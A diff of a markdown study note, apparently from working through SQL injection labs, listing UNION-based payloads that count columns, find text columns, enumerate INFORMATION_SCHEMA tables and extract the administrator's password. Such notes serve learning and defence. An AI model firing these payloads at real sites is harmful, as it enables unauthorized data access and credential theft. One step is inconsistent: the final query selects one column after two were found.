thanhcong0111/web_security/SQL Injection.md

 WHERE USERNAME_OTLSQB ='administrator'--` we can retrieve the administrator' password.

 ## 7. SQL injection UNION attack determining the number of columns returned by the query

+We can insert `'UNION SELECT NULL, NULL, NULL--` or `'ORDER BY 3--` to find the columns returned.
+Increase the number of `NULL` select columns or the number of columns, respectively in the ordering.

+With `'UNION SELECT NULL, NULL, NULL--` returns an error if the number of select columns is not correct.

+Using `'ORDER BY 3'` returns an error if the number of columns in the previous query is exceeded.

+## 8. SQL injection UNION attack, finding a column containing text

+Insert `'ORDER BY 3--` to determine the columns returned.

+Try inserting one by one to identify the text return column:

+`'UNION SELECT 'a', NULL, NULL--`

+`'UNION SELECT NULL, 'a', NULL--`

+`'UNION SELECT NULL, NULL, 'a'--`

+`...`

+## 9. SQL injection UNION attack, retrieving data from other tables

+Insert `'ORDER BY 2--` to determine the comlumns returned.

+Insert `'UNION SELECT TABLE_NAME, NULL FROM INFORMATION_SCHEMA.TABLES--` to determine table names that contain users' information.

+Insert `'UNION SELECT COLUMN_NAME, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users'--` to determine the columns that contain username and user password.

+Last, insert `'UNION SELECT password FROM users WHERE username = 'administrator'--` to retrieve the administrator's information.